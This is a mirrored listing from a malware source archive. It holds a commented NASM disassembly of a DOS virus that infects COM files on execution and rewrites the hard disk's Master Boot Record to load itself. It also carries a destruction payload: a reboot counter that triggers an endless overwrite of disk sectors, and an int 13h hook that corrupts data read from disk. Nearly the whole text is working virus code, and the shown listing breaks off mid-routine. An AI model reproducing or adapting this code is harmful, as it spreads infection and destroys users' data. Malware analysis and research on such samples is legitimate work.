mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-26 03:55:06 +00:00
685 lines
22 KiB
NASM
685 lines
22 KiB
NASM
|
seg_a segment byte public
|
|||
|
assume cs:seg_a, ds:seg_a
|
|||
|
|
|||
|
org 100h
|
|||
|
|
|||
|
start: jmp l_0CBD ;0100 E9 0BBA
|
|||
|
d_0103 db 'J' ;0103 4A
|
|||
|
|
|||
|
;=============================================================
|
|||
|
; Victim code here
|
|||
|
;-------------------------------------------------------------
|
|||
|
org 076Bh
|
|||
|
|
|||
|
;=============================================================
|
|||
|
; begin of virus code
|
|||
|
;-------------------------------------------------------------
|
|||
|
|
|||
|
;-------BOF pattern (jump into virus & contamination ptr)
|
|||
|
db 0E9h ;076B E9
|
|||
|
d_0101 dw 0682Ah ;jump distance ;076C 2A 68
|
|||
|
db 'J' ;076E 4A
|
|||
|
|
|||
|
;=============================================================
|
|||
|
; Partition table buffer (content not constant)
|
|||
|
;-------------------------------------------------------------
|
|||
|
r_0104: jmp short l_0775 ;076F EB 04
|
|||
|
db 90h ;0771 90
|
|||
|
db 'QQ' ;0772 51 51
|
|||
|
db 64h ;0774 64
|
|||
|
l_0775: push cs ;0775 0E
|
|||
|
pop ax ;0776 58
|
|||
|
cmp ax,0 ;0777 3D 0000
|
|||
|
je l_077F ;077A 74 03
|
|||
|
jmp short l_07D2 ;077C EB 54
|
|||
|
db 90h ;077E 90
|
|||
|
l_077F: cmp byte ptr cs:[7C05h],0 ;077F 2E: 80 3E 7C05 00
|
|||
|
jne l_0799 ;0785 75 12
|
|||
|
l_0787: mov ax,310h ;0787 B8 0310
|
|||
|
mov cx,1 ;078A B9 0001
|
|||
|
mov dx,80h ;078D BA 0080
|
|||
|
mov bx,0 ;0790 .BB 0000
|
|||
|
int 13h ;0793 CD 13
|
|||
|
stc ;0795 F9
|
|||
|
cli ;0796 FA
|
|||
|
jc l_0787 ;0797 72 EE
|
|||
|
l_0799: xor ax,ax ;0799 33 C0
|
|||
|
mov es,ax ;079B 8E C0
|
|||
|
dec byte ptr cs:[7C05h] ;079D 2E: FE 0E 7C05
|
|||
|
mov ax,301h ;07A2 B8 0301
|
|||
|
mov cx,1 ;07A5 B9 0001
|
|||
|
mov dx,80h ;07A8 BA 0080
|
|||
|
mov bx,7C00h ;07AB .BB 7C00
|
|||
|
int 13h ;07AE CD 13
|
|||
|
mov ax,1000h ;07B0 B8 1000
|
|||
|
mov es,ax ;07B3 8E C0
|
|||
|
mov ax,0 ;07B5 B8 0000
|
|||
|
mov ds,ax ;07B8 8E D8
|
|||
|
mov di,7C00h ;07BA .BF 7C00
|
|||
|
mov si,di ;07BD 8B F7
|
|||
|
cld ;07BF FC
|
|||
|
mov cx,200h ;07C0 B9 0200
|
|||
|
rep movsb ;07C3 F3/ A4
|
|||
|
mov ax,1000h ;07C5 B8 1000
|
|||
|
push ax ;07C8 50
|
|||
|
mov ax,7C00h ;07C9 B8 7C00
|
|||
|
push ax ;07CC 50
|
|||
|
mov bp,sp ;07CD 8B EC
|
|||
|
;* jmp dword ptr [bp] ;07CF FF 6E 00
|
|||
|
db 0FFh, 6Eh, 00h ;07CF FF 6E 00
|
|||
|
l_07D2: xor ax,ax ;07D2 33 C0
|
|||
|
mov ds,ax ;07D4 8E D8
|
|||
|
mov ax,27Bh ;07D6 B8 027B
|
|||
|
mov ds:[0413h],ax ;07D9 A3 0413
|
|||
|
mov ax,9F00h ;07DC B8 9F00
|
|||
|
mov es,ax ;07DF 8E C0
|
|||
|
mov bx,0100h ;07E1 .BB 0100
|
|||
|
mov al,8 ;07E4 B0 08
|
|||
|
mov ah,2 ;07E6 B4 02
|
|||
|
mov ch,0 ;07E8 B5 00
|
|||
|
mov cl,3 ;07EA B1 03
|
|||
|
mov dh,0 ;07EC B6 00
|
|||
|
mov dl,80h ;07EE B2 80
|
|||
|
int 13h ;07F0 CD 13
|
|||
|
xor ax,ax ;07F2 33 C0
|
|||
|
mov ds,ax ;07F4 8E D8
|
|||
|
mov word ptr ds:[03D4h],'JM' ;07F6 C7 06 03D4 4A4D
|
|||
|
mov ax,48Bh ;07FC B8 048B
|
|||
|
mov ds:[0070h],ax ;07FF A3 0070
|
|||
|
mov word ptr ds:[0072h],9F00h ;0802 C7 06 0072 9F00
|
|||
|
mov ax,0 ;0808 B8 0000
|
|||
|
mov es,ax ;080B 8E C0
|
|||
|
mov bx,7C00h ;080D .BB 7C00
|
|||
|
mov ah,2 ;0810 B4 02
|
|||
|
mov al,1 ;0812 B0 01
|
|||
|
mov ch,0 ;0814 B5 00
|
|||
|
mov cl,2 ;0816 B1 02
|
|||
|
mov dh,0 ;0818 B6 00
|
|||
|
mov dl,80h ;081A B2 80
|
|||
|
int 13h ;081C CD 13
|
|||
|
xor ax,ax ;081E 33 C0
|
|||
|
push ax ;0820 50
|
|||
|
mov ax,7C00h ;0821 B8 7C00
|
|||
|
push ax ;0824 50
|
|||
|
mov bp,sp ;0825 8B EC
|
|||
|
;* jmp dword ptr [bp] ;*1 entry ;0827 FF 6E 00
|
|||
|
db 0FFh, 6Eh, 00h ;0827 FF 6E 00
|
|||
|
db '. fixed disk.', 0Dh, 0Ah, 0Dh, 0Ah ;082A 2E 20 66 69 78 65
|
|||
|
;0830 64 20 64 69 73 6B
|
|||
|
;0836 2E 0D 0A 0D 0A
|
|||
|
db 'Insert COMPAQ DOS diskette in dr' ;083B 49 6E 73 65 72 74
|
|||
|
;0841 20 43 4F 4D 50 41
|
|||
|
;0847 51 20 44 4F 53 20
|
|||
|
;084D 64 69 73 6B 65 74
|
|||
|
;0853 74 65 20 69 6E 20
|
|||
|
;0859 64 72
|
|||
|
db 'ive A.', 0Dh, 0Ah, 'Press any ke' ;085B 69 76 65 20 41 2E
|
|||
|
;0861 0D 0A 50 72 65 73
|
|||
|
;0867 73 20 61 6E 79 20
|
|||
|
;086D 6B 65
|
|||
|
db 'y when ready: ' ;086F 79 20 77 68 65 6E
|
|||
|
;0875 20 72 65 61 64 79
|
|||
|
;087B 3A 20
|
|||
|
db 7 ;087D 07
|
|||
|
db 207 dup (0) ;087E 00CF[00]
|
|||
|
db 80h, 01h, 01h, 00h, 04h, 06h ;094D 80 01 01 00 04 06
|
|||
|
db 51h, 6Dh, 11h, 00h, 00h, 00h ;0953 51 6D 11 00 00 00
|
|||
|
db 11h,0AAh, 00h, 00h, 00h, 00h ;0959 11 AA 00 00 00 00
|
|||
|
db 41h, 6Eh, 04h, 06h, 91h,0DBh ;095F 41 6E 04 06 91 DB
|
|||
|
db 22h,0AAh, 00h, 00h, 22h,0AAh ;0965 22 AA 00 00 22 AA
|
|||
|
db 00h, 00h, 55h,0AAh ;096B 00 00 55 AA
|
|||
|
;----------------------------------------------------------------
|
|||
|
; partition table buffer end
|
|||
|
;----------------------------------------------------------------
|
|||
|
|
|||
|
r_0304 dw 1460h ;int 21h offset ;096F 60 14
|
|||
|
r_0306 dw 0273h ;int 21h segment ;0971 73 02
|
|||
|
|
|||
|
r_0308 dw 1DADh ;int 13h offset ;0973 AD 1D
|
|||
|
r_030A dw 0070h ;int 13h segment ;0973 70 00
|
|||
|
|
|||
|
db 2Bh ;0977 2B
|
|||
|
|
|||
|
r_030D db 1 ;desturction active if=0;0978 01
|
|||
|
r_030E dw 0 ;:= 0C8h - to activation;0979 00 00
|
|||
|
|
|||
|
r_0310 db 0E9h,34h,05h,01h ;victim bytes ;097B E9 34 05 01
|
|||
|
|
|||
|
r_0314 db 'Bad command or file name',0Dh,0Ah,'$' ;097F 42 61 64 20 63 6F
|
|||
|
;0985 6D 6D 61 6E 64 20
|
|||
|
;098B 6F 72 20 66 69 6C
|
|||
|
;0991 65 20 6E 61 6D 65
|
|||
|
;0997 0D 0A 24
|
|||
|
|
|||
|
d_032F dw 5 ;file handle ;099A 05 00
|
|||
|
d_0331 dw 066Bh ;healthy file length ;099C 6B 06
|
|||
|
|
|||
|
;===============================================================
|
|||
|
; Is virus resident ?
|
|||
|
;---------------------------------------------------------------
|
|||
|
s_099E proc near
|
|||
|
push ax ;099E 50
|
|||
|
push ds ;099F 1E
|
|||
|
xor ax,ax ;09A0 33 C0
|
|||
|
mov ds,ax ;09A2 8E D8
|
|||
|
cmp word ptr ds:[03D4h],'JM' ;int F5h ;09A4 81 3E 03D4 4A4D
|
|||
|
je l_09B0 ;09AA 74 04
|
|||
|
clc ;<- NOT resident ;09AC F8
|
|||
|
jmp short l_09B1 ;09AD EB 02
|
|||
|
db 90h ;09AF 90
|
|||
|
|
|||
|
l_09B0: stc ;<- YES, resident ;09B0 F9
|
|||
|
l_09B1: pop ds ;09B1 1F
|
|||
|
pop ax ;09B2 58
|
|||
|
retn ;09B3 C3
|
|||
|
s_099E endp
|
|||
|
|
|||
|
;===============================================================
|
|||
|
; Set infection flag
|
|||
|
;---------------------------------------------------------------
|
|||
|
s_09B4 proc near
|
|||
|
push ax ;09B4 50
|
|||
|
push ds ;09B5 1E
|
|||
|
xor ax,ax ;09B6 33 C0
|
|||
|
mov ds,ax ;09B8 8E D8
|
|||
|
mov word ptr ds:[03D4h],'JM' ;09BA C7 06 03D4 4A4D
|
|||
|
pop ds ;09C0 1F
|
|||
|
pop ax ;09C1 58
|
|||
|
retn ;09C2 C3
|
|||
|
s_09B4 endp
|
|||
|
|
|||
|
;===============================================================
|
|||
|
; Contamine first hard disk drive
|
|||
|
;---------------------------------------------------------------
|
|||
|
s_09C3 proc near
|
|||
|
push ds ;09C3 1E
|
|||
|
push es ;09C4 06
|
|||
|
push cs ;09C5 0E
|
|||
|
pop ds ;09C6 1F
|
|||
|
mov ah,2 ;read ;09C7 B4 02
|
|||
|
mov al,1 ;1 sector ;09C9 B0 01
|
|||
|
mov ch,0 ;track 0 ;09CB B5 00
|
|||
|
mov cl,1 ;sector 1 ;09CD B1 01
|
|||
|
mov dh,0 ;head 0 ;09CF B6 00
|
|||
|
mov dl,80h ;first hard disk drive ;09D1 B2 80
|
|||
|
push cs ;09D3 0E
|
|||
|
pop es ;09D4 07
|
|||
|
mov bx,0104h ;= l_076F ;09D5 .BB 0104
|
|||
|
int 13h ;09D8 CD 13
|
|||
|
|
|||
|
cmp cs:[0107h],'QQ' ;contamination signature;09DA 2E: 81 3E 0107 5151
|
|||
|
je l_0A38 ;-> allready infected ;09E1 74 55
|
|||
|
|
|||
|
;<- destruction variable initiation
|
|||
|
mov word ptr cs:[30Eh],0C8h ;= l_0979 count ;09E3 2E: C7 06 030E 00C8
|
|||
|
mov byte ptr cs:[30Dh],1 ;= l_0978 off ;09EA 2E: C6 06 030D 01
|
|||
|
mov byte ptr cs:[3D5h],64h ;= l_0A40 count ;09F0 2E: C6 06 03D5 64
|
|||
|
|
|||
|
;<- save oryginal
|
|||
|
mov ah,3 ;write ;09F6 B4 03
|
|||
|
mov al,1 ;1 sector ;09F8 B0 01
|
|||
|
mov ch,0 ;track 0 ;09FA B5 00
|
|||
|
mov cl,2 ;sector 2 ;09FC B1 02
|
|||
|
mov dh,0 ;head 0 ;09FE B6 00
|
|||
|
mov dl,80h ;1 HD Drive ;0A00 B2 80
|
|||
|
mov bx,104h ;= offset l_076F ;0A02 .BB 0104
|
|||
|
int 13h ;0A05 CD 13
|
|||
|
|
|||
|
;<- make new Master Boot Record
|
|||
|
mov cx,0BBh ;constant part length ;0A07 B9 00BB
|
|||
|
inc cx ;0A0A 41
|
|||
|
mov si,3D0h ;= offset l_0A3B ;0A0B .BE 03D0
|
|||
|
mov di,104h ;= offset l_076F ;0A0E .BF 0104
|
|||
|
cld ;0A11 FC
|
|||
|
rep movsb ;0A12 F3/ A4
|
|||
|
mov ah,3 ;write ;0A14 B4 03
|
|||
|
mov al,1 ;1 sector ;0A16 B0 01
|
|||
|
mov ch,0 ;track 0 ;0A18 B5 00
|
|||
|
mov cl,1 ;sector 1 ;0A1A B1 01
|
|||
|
mov dh,0 ;head 0 ;0A1C B6 00
|
|||
|
mov dl,80h ;1-st HD Drive ;0A1E B2 80
|
|||
|
mov bx,0104h ;= offset L_076F ;0A20 .BB 0104
|
|||
|
int 13h ;0A23 CD 13
|
|||
|
|
|||
|
;<- write rest of virus code
|
|||
|
mov al,8 ;8 sectors ;0A25 B0 08
|
|||
|
mov ah,3 ;write ;0A27 B4 03
|
|||
|
mov ch,0 ;track 0 ;0A29 B5 00
|
|||
|
mov cl,3 ;sector 3 ;0A2B B1 03
|
|||
|
mov dh,0 ;head 0 ;0A2D B6 00
|
|||
|
mov dl,80h ;1-st HD Drive ;0A2F B2 80
|
|||
|
mov bx,100h ;= offset L076B ;0A31 .BB 0100
|
|||
|
push cs ;0A34 0E
|
|||
|
pop es ;0A35 07
|
|||
|
int 13h ;0A36 CD 13
|
|||
|
|
|||
|
;<-- partition table allready infected
|
|||
|
l_0A38: pop es ;0A38 07
|
|||
|
pop ds ;0A39 1F
|
|||
|
retn ;0A3A C3
|
|||
|
s_09C3 endp
|
|||
|
|
|||
|
;================================================================
|
|||
|
; Master Boot Record code pattern
|
|||
|
;----------------------------------------------------------------
|
|||
|
jmp short l_0A41 ;0A3B EB 04
|
|||
|
nop ;0A3D 90
|
|||
|
|
|||
|
db 'QQ' ;contamination sygnature;0A3E 51 51
|
|||
|
r_03D5 db 64h ;reboot count to destr. ;0A40 64
|
|||
|
|
|||
|
l_0A41: push cs ;0A41 0E
|
|||
|
pop ax ;0A42 58
|
|||
|
cmp ax,0 ;0A43 3D 0000
|
|||
|
je l_0A4B ;0A46 74 03
|
|||
|
jmp short l_0A9E ;0A48 EB 54
|
|||
|
nop ;0A4A 90
|
|||
|
|
|||
|
;<- code to make destruction
|
|||
|
l_0A4B: cmp byte ptr cs:[7C05h],0 ;= r_0305 ;0A4B 2E: 80 3E 7C05 00
|
|||
|
jne l_0A65 ;-> counter not exhaused;0A51 75 12
|
|||
|
|
|||
|
l_0A53: mov ax,0310h ;write 16 sectors ;0A53 B8 0310
|
|||
|
mov cx,1 ;track 0, sector 0 ;0A56 B9 0001
|
|||
|
mov dx,80h ;head 0, HDD 0 ;0A59 BA 0080
|
|||
|
mov bx,0 ;buffer ;0A5C .BB 0000
|
|||
|
int 13h ;0A5F CD 13
|
|||
|
stc ;0A61 F9
|
|||
|
cli ;0A62 FA
|
|||
|
jc l_0A53 ;endless loop ;0A63 72 EE
|
|||
|
|
|||
|
l_0A65: xor ax,ax ;0A65 33 C0
|
|||
|
mov es,ax ;0A67 8E C0
|
|||
|
dec byte ptr cs:[7C05h] ;reboot counter ;0A69 2E: FE 0E 7C05
|
|||
|
mov ax,301h ;write counter to disk ;0A6E B8 0301
|
|||
|
mov cx,1 ;0A71 B9 0001
|
|||
|
mov dx,80h ;0A74 BA 0080
|
|||
|
mov bx,7C00h ;0A77 .BB 7C00
|
|||
|
int 13h ;0A7A CD 13
|
|||
|
|
|||
|
mov ax,1000h ;make virus boot copy ;0A7C B8 1000
|
|||
|
mov es,ax ;0A7F 8E C0
|
|||
|
mov ax,0 ;0A81 B8 0000
|
|||
|
mov ds,ax ;0A84 8E D8
|
|||
|
mov di,7C00h ;0A86 .BF 7C00
|
|||
|
mov si,di ;0A89 8B F7
|
|||
|
cld ;0A8B FC
|
|||
|
mov cx,200h ;0A8C B9 0200
|
|||
|
rep movsb ;0A8F F3/ A4
|
|||
|
mov ax,1000h ;0A91 B8 1000
|
|||
|
push ax ;0A94 50
|
|||
|
mov ax,7C00h ;0A95 B8 7C00
|
|||
|
push ax ;0A98 50
|
|||
|
mov bp,sp ;0A99 8B EC
|
|||
|
jmp dword ptr [bp] ;run boot code again ;0A9B FF 6E 00
|
|||
|
|
|||
|
l_0A9E: xor ax,ax ;0A9E 33 C0
|
|||
|
mov ds,ax ;0AA0 8E D8
|
|||
|
mov ax,27Bh ;= 635 ;0AA2 B8 027B
|
|||
|
mov ds:[0413h],ax ;BIOS memory size ;0AA5 A3 0413
|
|||
|
mov ax,9F00h ;0AA8 B8 9F00
|
|||
|
mov es,ax ;0AAB 8E C0
|
|||
|
mov bx,0100h ;virus offset ;0AAD .BB 0100
|
|||
|
mov al,8 ;8 sectors ;0AB0 B0 08
|
|||
|
mov ah,2 ;read ;0AB2 B4 02
|
|||
|
mov ch,0 ;track ;0AB4 B5 00
|
|||
|
mov cl,3 ;sector ;0AB6 B1 03
|
|||
|
mov dh,0 ;head ;0AB8 B6 00
|
|||
|
mov dl,80h ;hdd nr 0 ;0ABA B2 80
|
|||
|
int 13h ;0ABC CD 13
|
|||
|
|
|||
|
xor ax,ax ;0ABE 33 C0
|
|||
|
mov ds,ax ;0AC0 8E D8
|
|||
|
mov word ptr ds:[03D4h],'JM' ;virus sign. ;0AC2 C7 06 03D4 4A4D
|
|||
|
mov ax,48Bh ;0AC8 B8 048B
|
|||
|
mov ds:[0070h],ax ;int 1Ch offs ;0ACB A3 0070
|
|||
|
mov word ptr ds:[0072h],9F00h;int 1Ch seg ;0ACE C7 06 0072 9F00
|
|||
|
mov ax,0 ;0AD4 B8 0000
|
|||
|
mov es,ax ;0AD7 8E C0
|
|||
|
mov bx,7C00h ;oryg.boot buffer ;0AD9 .BB 7C00
|
|||
|
mov ah,2 ;read ;0ADC B4 02
|
|||
|
mov al,1 ;1 sector ;0ADE B0 01
|
|||
|
mov ch,0 ;track=0 ;0AE0 B5 00
|
|||
|
mov cl,2 ;oryg. boot sector = 2 ;0AE2 B1 02
|
|||
|
mov dh,0 ;head ;0AE4 B6 00
|
|||
|
mov dl,80h ;drive ;0AE6 B2 80
|
|||
|
int 13h ;0AE8 CD 13
|
|||
|
|
|||
|
xor ax,ax ;0AEA 33 C0
|
|||
|
push ax ;0AEC 50
|
|||
|
mov ax,7C00h ;0AED B8 7C00
|
|||
|
push ax ;0AF0 50
|
|||
|
mov bp,sp ;0AF1 8B EC
|
|||
|
jmp dword ptr [bp] ;0AF3 FF 6E 00
|
|||
|
;-------End of MBR pattern
|
|||
|
|
|||
|
;================================================================
|
|||
|
; int 1Ch handling routine (wait until DOS establishing vectors)
|
|||
|
;----------------------------------------------------------------
|
|||
|
cmp word ptr cs:[30Eh],0 ;0AF6 2E: 83 3E 030E 00
|
|||
|
jne l_0AFF ;0AFC 75 01
|
|||
|
iret ;0AFE CF
|
|||
|
|
|||
|
l_0AFF: push ax ;0AFF 50
|
|||
|
push ds ;0B00 1E
|
|||
|
xor ax,ax ;0B01 33 C0
|
|||
|
mov ds,ax ;0B03 8E D8
|
|||
|
mov word ptr ds:[03D4h],'JM' ;0B05 C7 06 03D4 4A4D
|
|||
|
dec word ptr cs:[30Eh] ;0B0B 2E: FF 0E 030E
|
|||
|
cmp word ptr cs:[30Eh],0 ;counter to dest;0B10 2E: 83 3E 030E 00
|
|||
|
jne l_0B54 ;0B16 75 3C
|
|||
|
cli ;0B18 FA
|
|||
|
mov byte ptr cs:[30Dh],0 ;destruct.active;0B19 2E: C6 06 030D 00
|
|||
|
xor ax,ax ;0B1F 33 C0
|
|||
|
mov ds,ax ;0B21 8E D8
|
|||
|
mov ax,ds:[084h] ;int 21h offset ;0B23 A1 0084
|
|||
|
mov word ptr cs:[304h],ax ;0B26 2E: A3 0304
|
|||
|
mov ax,ds:[086h] ;int 21h segment;0B2A A1 0086
|
|||
|
mov word ptr cs:[306h],ax ;0B2D 2E: A3 0306
|
|||
|
mov ax,ds:[04Ch] ;int 13h offset ;0B31 A1 004C
|
|||
|
mov word ptr cs:[308h],ax ;0B34 2E: A3 0308
|
|||
|
mov ax,ds:[04Eh] ;int 13h segment;0B38 A1 004E
|
|||
|
mov word ptr cs:[30Ah],ax ;0B3B 2E: A3 030A
|
|||
|
;<- int 21h
|
|||
|
mov word ptr ds:[084h],51Bh ;L_0B86 = offset;0B3F C7 06 0084 051B
|
|||
|
mov ds:[086h],cs ; segment;0B45 8C 0E 0086
|
|||
|
;<- int 13h
|
|||
|
mov word ptr ds:[04Ch],4ECh ;L_0B57 = offset;0B49 C7 06 004C 04EC
|
|||
|
mov ds:[04Eh],cs ; segment;0B4F 8C 0E 004E
|
|||
|
|
|||
|
sti ;0B53 FB
|
|||
|
l_0B54: pop ds ;0B54 1F
|
|||
|
pop ax ;0B55 58
|
|||
|
iret ;0B56 CF
|
|||
|
|
|||
|
;===============================================================
|
|||
|
; Int 13 handling routine - sector destruction
|
|||
|
;---------------------------------------------------------------
|
|||
|
CMP BYTE PTR cs:[030Dh],1 ;disable ? ;0B57 2E803E0D0301
|
|||
|
JZ l_0B81 ;-> yes ;0B5D 7422
|
|||
|
CMP AH,2 ;0B5F 80FC02
|
|||
|
JNZ l_0B81 ;0B62 751D
|
|||
|
INC BYTE PTR cs:[030Ch] ;interval 256 ;0B64 2EFE060C03
|
|||
|
CMP BYTE PTR cs:[030Ch],00 ;0B69 2E803E0C0300
|
|||
|
JNZ l_0B81 ;->still waiting;0B6F 7510
|
|||
|
PUSHF ;0B71 9C
|
|||
|
CALL dword ptr cs:[0308h] ;int 13h;0B72 2EFF1E0803
|
|||
|
MOV WORD PTR es:[BX+00C8h],'jm' ;destr. ;0B77 26C787C8006D6A
|
|||
|
RETF 2 ;0B7E CA0200
|
|||
|
|
|||
|
l_0B81: JMP dword ptr cs:[0308h] ;int 13h;0B81 2EFF2E0803
|
|||
|
|
|||
|
;===============================================================
|
|||
|
; Int 21h service routine
|
|||
|
;---------------------------------------------------------------
|
|||
|
r_051B: CMP AX,4B00h ;0B86 3D004B
|
|||
|
JZ l_0B8E ;0B89 7403
|
|||
|
JMP l_0C5F ;-> oryginal service ;0B8B E9D100
|
|||
|
|
|||
|
;<- run program, contamine before
|
|||
|
l_0B8E: push ax ;0B8E 50
|
|||
|
push bx ;0B8F 53
|
|||
|
push cx ;0B90 51
|
|||
|
push dx ;0B91 52
|
|||
|
push bp ;0B92 55
|
|||
|
push di ;0B93 57
|
|||
|
push si ;0B94 56
|
|||
|
push ds ;0B95 1E
|
|||
|
push es ;0B96 06
|
|||
|
call s_0C64 ;check type of victim ;0B97 E8 00CA
|
|||
|
jnc l_0B9F ;-> COM ;0B9A 73 03
|
|||
|
jmp l_0C50 ;-> not COM ;0B9C E9 00B1
|
|||
|
|
|||
|
l_0B9F: mov ax,4301h ;set file attribute ;0B9F B8 4301
|
|||
|
mov cx,0 ;no atributtes ;0BA2 B9 0000
|
|||
|
int 21h ;0BA5 CD 21
|
|||
|
|
|||
|
mov byte ptr cs:[30Dh],1 ;no destruction ;0BA7 2E: C6 06 030D 01
|
|||
|
mov ah,3Dh ;open file ;0BAD B4 3D
|
|||
|
mov al,2 ;read/write ;0BAF B0 02
|
|||
|
int 21h ;0BB1 CD 21
|
|||
|
|
|||
|
jnc l_0BB8 ;-> O.K. ;0BB3 73 03
|
|||
|
jmp l_0C50 ;-> error, exit ;0BB5 E9 0098
|
|||
|
|
|||
|
l_0BB8: mov word ptr cs:[32Fh],ax ;file handle ;0BB8 2E: A3 032F
|
|||
|
call s_0C7F ;check if file infected ;0BBC E8 00C0
|
|||
|
jnc l_0BC4 ;-> no ;0BBF 73 03
|
|||
|
jmp l_0C47 ;-> yes ;0BC1 E9 0083
|
|||
|
|
|||
|
l_0BC4: xor cx,cx ;offset := 0 ;0BC4 33 C9
|
|||
|
mov dx,cx ;0BC6 8B D1
|
|||
|
mov ax,4200h ;move file ptr BOF+offs ;0BC8 B8 4200
|
|||
|
mov bx,word ptr cs:[32Fh] ;file handle ;0BCB 2E: 8B 1E 032F
|
|||
|
int 21h ;0BD0 CD 21
|
|||
|
|
|||
|
mov cx,4 ;4 bytes ;0BD2 B9 0004
|
|||
|
mov bx,word ptr cs:[32Fh] ;file handle ;0BD5 2E: 8B 1E 032F
|
|||
|
mov dx,310h ;L097B = safes ;0BDA .BA 0310
|
|||
|
mov ah,3Fh ;read file ;0BDD B4 3F
|
|||
|
push cs ;0BDF 0E
|
|||
|
pop ds ;0BE0 1F
|
|||
|
int 21h ;0BE1 CD 21
|
|||
|
|
|||
|
jnc l_0BE8 ;-> O.K. ;0BE3 73 03
|
|||
|
jmp short l_0C47 ;-> ERROR ;0BE5 EB 60
|
|||
|
nop ;0BE7 90
|
|||
|
|
|||
|
l_0BE8: mov ax,4202h ;file ptr EOF+of;0BE8 B8 4202
|
|||
|
mov bx,word ptr cs:[32Fh] ;file handle ;0BEB 2E: 8B 1E 032F
|
|||
|
xor cx,cx ;offset=0 ;0BF0 33 C9
|
|||
|
xor dx,dx ;0BF2 33 D2
|
|||
|
int 21h ;0BF4 CD 21
|
|||
|
|
|||
|
mov word ptr cs:[331h],ax ;L099C = file l.;0BF6 2E: A3 0331
|
|||
|
cmp dx,0 ;high order word;0BFA 83 FA 00
|
|||
|
je l_0C02 ;-> LT 64K bytes;0BFD 74 03
|
|||
|
jmp short l_0C47 ;-> file too big;0BFF EB 46
|
|||
|
nop ;0C01 90
|
|||
|
|
|||
|
l_0C02: and ah,7Fh ;??? ;0C02 80 E4 7F
|
|||
|
cmp ax,32h ;minimum file size ;0C05 3D 0032
|
|||
|
jg l_0C0D ;-> O.K. ;0C08 7F 03
|
|||
|
jmp short l_0C47 ;-> too small ;0C0A EB 3B
|
|||
|
nop ;0C0C 90
|
|||
|
|
|||
|
l_0C0D: mov ah,40h ;file write ;0C0D B4 40
|
|||
|
mov bx,word ptr cs:[32Fh] ;file handle ;0C0F 2E: 8B 1E 032F
|
|||
|
mov cx,5E9h ;virus length ;0C14 B9 05E9
|
|||
|
push cs ;0C17 0E
|
|||
|
pop ds ;virus segment ;0C18 1F
|
|||
|
mov dx,100h ;virus offset ;0C19 .BA 0100
|
|||
|
int 21h ;0C1C CD 21
|
|||
|
|
|||
|
mov ax,word ptr cs:[331h] ;file length ;0C1E 2E: A1 0331
|
|||
|
add ax,54Fh ;(+3 = L0CBD) ;0C22 05 054F
|
|||
|
mov word ptr cs:[101h],ax ;0C25 2E: A3 0101
|
|||
|
xor cx,cx ;offset := 0 ;0C29 33 C9
|
|||
|
xor dx,dx ;0C2B 33 D2
|
|||
|
mov al,0 ;BOF + offset ;0C2D B0 00
|
|||
|
mov ah,42h ;set file ptr ;0C2F B4 42
|
|||
|
mov bx,word ptr cs:[32Fh] ;file handle ;0C31 2E: 8B 1E 032F
|
|||
|
int 21h ;0C36 CD 21
|
|||
|
|
|||
|
mov cx,4 ;4 bytes ;0C38 B9 0004
|
|||
|
mov ah,40h ;write file ;0C3B B4 40
|
|||
|
mov bx,word ptr cs:[32Fh] ;file handle ;0C3D 2E: 8B 1E 032F
|
|||
|
mov dx,100h ;virus start cod;0C42 .BA 0100
|
|||
|
int 21h ;0C45 CD 21
|
|||
|
|
|||
|
;<- Contamination error entry
|
|||
|
l_0C47: mov bx,word ptr cs:[32Fh] ;file handle ;0C47 2E: 8B 1E 032F
|
|||
|
mov ah,3Eh ;close file ;0C4C B4 3E
|
|||
|
int 21h ;0C4E CD 21
|
|||
|
|
|||
|
;<-- file not infectable or end of infection
|
|||
|
l_0C50: mov byte ptr cs:[30Dh],0 ;enable destruct;0C50 2E: C6 06 030D 00
|
|||
|
pop es ;0C56 07
|
|||
|
pop ds ;0C57 1F
|
|||
|
pop si ;0C58 5E
|
|||
|
pop di ;0C59 5F
|
|||
|
pop bp ;0C5A 5D
|
|||
|
pop dx ;0C5B 5A
|
|||
|
pop cx ;0C5C 59
|
|||
|
pop bx ;0C5D 5B
|
|||
|
pop ax ;0C5E 58
|
|||
|
l_0C5F: jmp dword ptr cs:[304h] ;oryg. int 21h ;0C5F 2E: FF 2E 0304
|
|||
|
|
|||
|
;=======================================================
|
|||
|
; Subroutine - check type of victim
|
|||
|
;-------------------------------------------------------
|
|||
|
s_0C64 proc near
|
|||
|
push ax ;0C64 50
|
|||
|
push bx ;0C65 53
|
|||
|
mov bx,dx ;victim name offset ;0C66 8B DA
|
|||
|
mov al,0 ;End of path char ;0C68 B0 00
|
|||
|
l_0C6A: inc bx ;0C6A 43
|
|||
|
cmp [bx],al ;0C6B 38 07
|
|||
|
jne l_0C6A ;0C6D 75 FB
|
|||
|
mov ax,4D4Fh ;'MO'- last COM letters ;0C6F B8 4D4F
|
|||
|
cmp [bx-2],ax ;0C72 39 47 FE
|
|||
|
je l_0C7B ;-> it's COM ;0C75 74 04
|
|||
|
stc ;'not infectable' - ptr ;0C77 F9
|
|||
|
jmp short l_0C7C ;0C78 EB 02
|
|||
|
db 90h ;0C7A 90
|
|||
|
l_0C7B: clc ;'infectable' - ptr ;0C7B F8
|
|||
|
l_0C7C: pop bx ;0C7C 5B
|
|||
|
pop ax ;0C7D 58
|
|||
|
retn ;0C7E C3
|
|||
|
s_0C64 endp
|
|||
|
|
|||
|
;=======================================================
|
|||
|
; Subroutine - check if file infected
|
|||
|
;-------------------------------------------------------
|
|||
|
s_0C7F proc near
|
|||
|
jmp short l_0C83 ;0C7F EB 02
|
|||
|
nop ;0C81 90
|
|||
|
|
|||
|
d_0C82 db 1 ;1 char file buffer ;0C82 01
|
|||
|
|
|||
|
l_0C83: push ax ;0C83 50
|
|||
|
push bx ;0C84 53
|
|||
|
push cx ;0C85 51
|
|||
|
push dx ;0C86 52
|
|||
|
push es ;0C87 06
|
|||
|
push ds ;0C88 1E
|
|||
|
push cs ;0C89 0E
|
|||
|
pop ds ;0C8A 1F
|
|||
|
mov ax,4200h ;move file ptr BOF+offs ;0C8B B8 4200
|
|||
|
mov bx,word ptr cs:[32Fh] ;file handle ;0C8E 2E: 8B 1E 032F
|
|||
|
xor cx,cx ;0C93 33 C9
|
|||
|
mov dx,3 ;0:3 ;0C95 BA 0003
|
|||
|
int 21h ;0C98 CD 21
|
|||
|
|
|||
|
mov ah,3Fh ;read ;0C9A B4 3F
|
|||
|
mov cx,1 ;1 byte ;0C9C B9 0001
|
|||
|
